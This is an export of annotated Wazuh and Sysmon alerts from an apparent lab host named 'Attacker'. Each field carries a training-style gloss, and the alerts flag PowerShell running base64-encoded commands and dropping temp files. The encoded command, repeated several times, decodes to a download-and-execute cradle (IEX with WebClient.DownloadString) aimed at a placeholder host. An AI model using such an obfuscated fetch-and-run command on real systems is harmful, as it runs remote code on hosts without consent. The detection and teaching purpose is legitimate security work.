data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1096594 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:08.9070653Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282583 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:08.897
ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ProcessId: 652
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4zn2k3va.n12.ps1
CreationUtcTime: 2025-04-24 22:36:08.897
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:08.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4zn2k3va.n12.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:08.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1099355 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:11.0618882Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282615 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:09.916
ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ProcessId: 852
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ParentProcessId: 652
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:09.916 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1107410 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:11.3086728Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282616 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:11.299
ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ProcessId: 852
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qvvde2p2.pvc.ps1
CreationUtcTime: 2025-04-24 22:36:11.299
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:11.299 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qvvde2p2.pvc.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:11.299 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1110171 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:13.4580716Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282642 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:12.326
ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ProcessId: 8684
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00}
ParentProcessId: 852
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:12.326 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534220.1118230 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:13.7009783Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282643 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:13.637
ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ProcessId: 8684
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1
CreationUtcTime: 2025-04-24 22:36:13.634
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:13.637 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
